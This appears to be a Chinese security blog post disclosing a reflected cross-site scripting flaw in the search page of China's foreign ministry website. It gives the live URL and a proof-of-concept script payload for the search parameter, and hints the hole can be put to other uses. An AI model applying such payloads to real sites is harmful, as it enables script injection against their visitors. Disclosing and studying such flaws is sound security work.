张百川(网路游侠)的博客

张百川(网路游侠,www.youxia.org)专注:网络安全、系统安全、应用安全、数据库安全、运维安全。

导航

« 网路游侠:使用数据库扫描系统评估数据库的安全性WinManager内网安全管理和文档加密管理系统 »

中国人民共和国外交部网站的一个跨站漏洞

  中华人民共和国外交部网站 http://www.fmprc.gov.cn
  这个XSS漏洞不难利用,问题在 search.jsp 文件过滤不严格,且没有过滤post提交的数据,我们看看攻击的截图:

  或者这个:

  当然,用来做点别的也行……
  测试链接:

http://www.fmprc.gov.cn/wjb/search.jsp?searchword=<script>alert('youxia')</script>

  或在:
  http://www.fmprc.gov.cn/wjb/search.jsp
  搜索框中输入:

<script>alert('youxia')</script>

Share

  • 相关文章:

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Tags

站内搜索-Search

  • 找不到需要的?搜下试试!

日历

最近发表

产品推广

最新评论及回复

Powered By Z-Blog 1.8 Walle Build 91204 Using ThinkTwice Theme Designed By Sino Blog

Auto Publisher Copyright 2005-2009 Www.YouXia.Org . 陕ICP备05000100号